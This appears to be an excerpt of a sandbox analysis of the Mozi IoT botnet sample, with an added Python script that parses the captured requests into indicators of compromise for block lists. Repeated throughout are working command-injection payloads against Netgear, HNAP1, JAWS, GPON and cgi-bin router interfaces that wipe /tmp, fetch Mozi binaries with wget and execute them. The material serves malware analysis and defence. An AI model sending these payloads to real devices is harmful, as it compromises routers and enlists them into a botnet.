                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.218.148.138:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: /tmp/Mozi.m (PID: 4603)Socket: 0.0.0.0::56870
                Source: unknownTCP traffic detected without corresponding DNS query: 174.143.64.178
                Source: unknownTCP traffic detected without corresponding DNS query: 162.234.162.7
                Source: unknownTCP traffic detected without corresponding DNS query: 49.44.95.153
                Source: unknownTCP traffic detected without corresponding DNS query: 155.152.8.152
                Source: unknownTCP traffic detected without corresponding DNS query: 214.112.173.213
                Source: unknownTCP traffic detected without corresponding DNS query: 206.186.242.243
                Source: unknownTCP traffic detected without corresponding DNS query: 201.254.11.90
                Source: unknownTCP traffic detected without corresponding DNS query: 120.148.200.141
                Source: unknownTCP traffic detected without corresponding DNS query: 7.82.224.45
                Source: unknownTCP traffic detected without corresponding DNS query: 17.46.202.252
                Source: unknownTCP traffic detected without corresponding DNS query: 182.58.239.246
                Source: unknownTCP traffic detected without corresponding DNS query: 170.141.215.107
                Source: unknownTCP traffic detected without corresponding DNS query: 68.124.102.212
                Source: unknownTCP traffic detected without corresponding DNS query: 94.194.209.135
                Source: unknownTCP traffic detected without corresponding DNS query: 11.202.4.51
                Source: unknownTCP traffic detected without corresponding DNS query: 191.117.242.253
                Source: unknownTCP traffic detected without corresponding DNS query: 198.228.200.241
                Source: unknownTCP traffic detected without corresponding DNS query: 24.29.191.22
                Source: unknownTCP traffic detected without corresponding DNS query: 60.207.103.133
                Source: unknownTCP traffic detected without corresponding DNS query: 12.67.83.95
                Source: unknownTCP traffic detected without corresponding DNS query: 174.98.164.70
                Source: unknownTCP traffic detected without corresponding DNS query: 35.119.229.43
                Source: unknownTCP traffic detected without corresponding DNS query: 121.130.73.42
                Source: unknownTCP traffic detected without corresponding DNS query: 186.54.121.35
                Source: unknownTCP traffic detected without corresponding DNS query: 218.243.118.179
                Source: unknownTCP traffic detected without corresponding DNS query: 190.127.144.31
                Source: unknownTCP traffic detected without corresponding DNS query: 142.48.174.160
                Source: unknownTCP traffic detected without corresponding DNS query: 128.70.68.149
                Source: unknownTCP traffic detected without corresponding DNS query: 76.44.19.56
                Source: unknownTCP traffic detected without corresponding DNS query: 131.221.67.66
                Source: unknownTCP traffic detected without corresponding DNS query: 26.221.252.159
                Source: unknownTCP traffic detected without corresponding DNS query: 218.184.12.7
                Source: unknownTCP traffic detected without corresponding DNS query: 98.38.174.140
                Source: unknownTCP traffic detected without corresponding DNS query: 57.122.76.123
                Source: unknownTCP traffic detected without corresponding DNS query: 153.254.249.142
                Source: unknownTCP traffic detected without corresponding DNS query: 75.81.234.138
                Source: unknownTCP traffic detected without corresponding DNS query: 205.200.160.114
                Source: unknownTCP traffic detected without corresponding DNS query: 82.24.32.9
                Source: unknownTCP traffic detected without corresponding DNS query: 195.12.213.244
                Source: unknownTCP traffic detected without corresponding DNS query: 120.94.211.11
                Source: unknownTCP traffic detected without corresponding DNS query: 137.170.59.38
                Source: unknownTCP traffic detected without corresponding DNS query: 99.92.234.88
                Source: unknownTCP traffic detected without corresponding DNS query: 91.225.198.104
                Source: unknownTCP traffic detected without corresponding DNS query: 81.4.149.202
                Source: unknownTCP traffic detected without corresponding DNS query: 23.238.107.169
                Source: unknownTCP traffic detected without corresponding DNS query: 171.254.103.135
                Source: unknownTCP traffic detected without corresponding DNS query: 7.39.247.208
                Source: unknownTCP traffic detected without corresponding DNS query: 125.223.44.138
                Source: unknownTCP traffic detected without corresponding DNS query: 146.247.28.72
                Source: unknownTCP traffic detected without corresponding DNS query: 38.24.144.193
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/htmlContent-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 06 Jan 2021 14:00:05 GMTContent-Length: 853Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e af 8e 8a a2 59 56 b3 3c cd 97 d3 6a bd 6c f3 3a 9f a5 d9 32 cd eb ba aa d3 ab 79 be 4c 57 75 35 cd 9b a6 58 5e a4 ed 3c 4f eb fc 17 ad f3 a6 1d 3f be bb 3a 7a bc aa f3 b4 69 af cb fc b3 8f 26 d9 f4 ed 45 4d 30 66 db d3 aa ac ea 47 69 ce cf 47 47 df 7e 75 fa fa ab e7 6f 1e a5 3b ef f6 92 6f bf 79 f3 92 5e c9 da 75 f3 28 bd bf b3 23 1f d4 79 d6 54 cb 47 e9 19 30 58 66 65 fa 3a af 2f f3 3a 3d 05 1a d4 53 9d 53 5f 47 bf 4f b5 4e 33 ea b1 ce a7 79 71 29 08 15 4d ca 10 f6 76 76 e8 f3 66 55 2d 9b 3c 9d e4 d3 6c 4d 3f 1f 67 e9 bc ce cf 3f 9b b7 ed aa 79 74 f7 ee 45 d1 ce d7 93 f1 b4 5a dc 6d 7f 3a 5b 4e 7f b0 7e 7b 57 09 70 77 52 56 93 bb 8b ac 21 04 ee 36 f5 f4 6e 93 2d 56 65 de dc 9d 56 cb f3 e2 62 5d 67 6d 51 2d ef 5e e5 78 1d 9f 1c 35 d7 d4 76 31 a6 4f 04 59 0b e9 f7 9c e5 97 8c 78 73 ba cc 26 65 3e 7b 7c 37 3b 4a e5 2d 85 93 36 79 db 62 00 84 fe c7 6d bd ce 3f 56 7a 1e 9d 2d d3 6c 36 2b b8 51 5b d1 00 f3 b4 ac 2e d2 ea 9c 88 36 ab d6 2d 4d ce 0c bf d2 04 e1 43 7c 8f 4e c7 f9 bb dc cc d4 08 7d 35 05 35 49 d7 3c 6d 3e 19 88 0a 6d 45 c3 fc c1 58 09 30 ae ea 8b bb 7b 3b bb bb 77 e9 7f b3 7c b2 be d8 06 c0 9f 6e b6 b3 d5 aa 2c a6 8c 6f b3 5d 2d b7 af 8a e5 ac ba 6a c6 f3 76 51 1e 71 cb 0b 82 ce 83 03 52 b7 ec 65 e7 e1 5d c6 6a 3b bf cc 97 ed 76 5b 67 53 fc 75 5e d5 a6 83 ed b6 92 3e 4e df 7c 37 c5 f7 79 c3 9d 10 39 ce d7 35 8d b8 4e 67 45 76 b1 ac 68 86 e9 2f 0c 9b a8 bc 30 14 7c 43 1f 61 04 3e 49 d2 79 d6 d0 87 6d 7a 55 17 6d 4b 4c 9d 2d af d3 62 49 9d 2e 78 7c 80 6d 88 5a a7 3a 91 e9 15 bd b4 e6 29 c4 f7 d3 6c d5 ae 89 fb 98 e7 bc 77 c7 e9 33 96 89 65 4b 0c 08 36 c6 a4 b6 f3 ac a5 7f 72 0b 6b 51 cd d6 04 87 be f2 20 52 fb 36 4f 33 9e e1 f3 42 3f d4 6e 08 9d ee 74 af db 15 7d 72 5e 57 0b 1a 8b 0c 70 9c be 2c a9 d3 3c 9d ce f3 e9 5b ea d1 74 3b 23 7c 8a f6 da f0 c8 d9 d9 eb d4 9b cf 74 55 55 65 5a af 97 4b a2 3d 37 60 80 3f dd 04 8d 40 34 42 11 0a 61 c6 94 23 5c a7 4c ce 55 5e 2f 0a d2 09 c4 19 c0 19 00 66 05 89 65 5b d5 d4 25 91 93 3e 68 58 2a a0 43 68 34 f8 20 d6 05 d1 a3 ac e8 f7 7c 36 4e 8f 4b 92 bd 25 7d 7e 99 97 d7 e9 35 09 fb 94 34 d1 ac 68 98 5e 44 23 b0 5b 3a b9 26 c8 22 3c 3e c7 fd 10 c5 5b 31 f1 85 3b 27 fe 23 82 83 da f4 82 82 00 65 3e 3e cf ca 26 ff 78 fc ff 00 21 3f 1f df 6a 05 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"YV<jl:2yLWu5X^<O?:zi&EM0fGiGG~u
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.44.146.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 203.146.142.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 203.146.142.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 203.146.142.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 54.164.156.191:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.196.102.179:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.98.58.115:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 192.155.170.244:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 184.31.173.81:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Jan 2021 13:57:39 GMTServer: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
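The requests captured above are the sample's outbound exploitation attempts, all staging from the same host:port (192.168.1.1:8088 in this run): a Netgear setup.cgi `todo=syscmd` command injection, an HNAP1 request whose command rides inside the SOAPAction header between backticks, the JAWS `/shell?` injection with the "Hello, world" User-Agent, `board.cgi?cmd=`, a `/cgi-bin/;` path injection that spells spaces as `${IFS}`, and a GPON `diag_Form` POST whose `dest_host` field carries the command (the 404 from an Apache server shows that particular target was not a GPON device). The Python below is an added example, not part of the report or of the Mozi sample: it parses such captured requests, pulls out the injected shell fragment, the payload URLs and the stager host:port, so a capture can be turned into block-list and hunt entries. The sample requests are rebuilt from the report's flattened lines with line breaks restored (the HNAP1 SOAP body is abbreviated because it plays no part in the injection); the vector labels are descriptive and are not vendor advisory identifiers.

```python
import re
from urllib.parse import unquote_plus

# Request-path prefixes seen in the capture, with descriptive labels (not advisory IDs).
VECTORS = (
    ("/setup.cgi", "netgear setup.cgi todo=syscmd"),
    ("/HNAP1/", "HNAP1 SOAPAction backtick injection"),
    ("/shell", "JAWS /shell command injection"),
    ("/board.cgi", "board.cgi cmd= injection"),
    ("/GponForm/diag_Form", "GPON diag_Form dest_host injection"),
    ("/cgi-bin/;", "cgi-bin path injection using ${IFS}"),
)
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s;&|<>`]*")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def injected_command(req: dict) -> str:
    """Return the shell fragment the request tries to make the device execute."""
    m = re.search(r"`([^`]+)`", req["headers"].get("soapaction", ""))
    if m:                                   # HNAP1: command sits inside the SOAPAction header
        return m.group(1)
    path, _, query = req["target"].partition("?")
    if path.startswith("/cgi-bin/;"):       # the path itself is the command, spaces as ${IFS}
        return unquote_plus(path[len("/cgi-bin/;"):]).replace("${IFS}", " ")
    if path == "/shell":                    # JAWS: the whole query string is the command
        return unquote_plus(query)
    for key in ("cmd", "dest_host"):        # setup.cgi / board.cgi query, GPON form body
        for source in (query, req["body"]):
            m = re.search(rf"(?:^|&){key}=([^&]*)", source)
            if m:
                return unquote_plus(m.group(1))
    return ""


def extract_iocs(raw: str) -> dict:
    """Vector label, scanned host, injected command, payload URLs and stager host:port."""
    req = parse_request(raw)
    cmd = injected_command(req)
    urls = URL_RE.findall(cmd)
    vector = next((label for prefix, label in VECTORS
                   if req["target"].startswith(prefix)), "unknown")
    return {
        "vector": vector,
        "victim": req["headers"].get("host", ""),   # the scan target, not the infected device
        "command": cmd,
        "payload_urls": urls,
        "stagers": sorted({u.split("/")[2] for u in urls}),
    }


# Constructed inputs: the report's capture lines with CRLF line breaks restored.
SAMPLES = {
    "netgear": (
        "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;"
        "wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear"
        "&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n"
    ),
    "hnap": (
        "POST /HNAP1/ HTTP/1.0\r\nHost: 51.178.69.101:80\r\n"
        'Content-Type: text/xml; charset="utf-8"\r\n'
        "SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && "
        "wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\n"
        '\r\n<?xml version="1.0"?><soap:Envelope/>'        # body abbreviated
    ),
    "jaws": (
        "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;"
        "chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\n"
        "Host: 23.44.146.105:80\r\n\r\n"
    ),
    "gpon": (
        "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\n"
        "User-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n"
        "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;"
        "wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0"
    ),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        ioc = extract_iocs(raw)
        print(f"{name:8} {ioc['vector']:40} victim={ioc['victim'] or '-':18} "
              f"stagers={ioc['stagers']}")
        print(f"         cmd: {ioc['command']}")
```

The `stagers` values are what belongs on a block list; `victim` is the address the infected host was probing (the Netgear requests carry no Host header, so it stays empty, exactly as in the capture). The `/cgi-bin/;` branch is kept for the truncated request in the report but is not among the constructed samples.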
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;$
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: Mozi.mString found in binary or memory: http://%s:%d/bin.sh
                Source: Mozi.mString found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: Mozi.mString found in binary or memory: http://127.0.0.1
                Source: Mozi.mString found in binary or memory: http://127.0.0.1sendcmd
                Source: Mozi.mString found in binary or memory: http://HTTP/1.1
                Source: Mozi.mString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.6.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: Mozi.mString found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: Mozi.mString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca
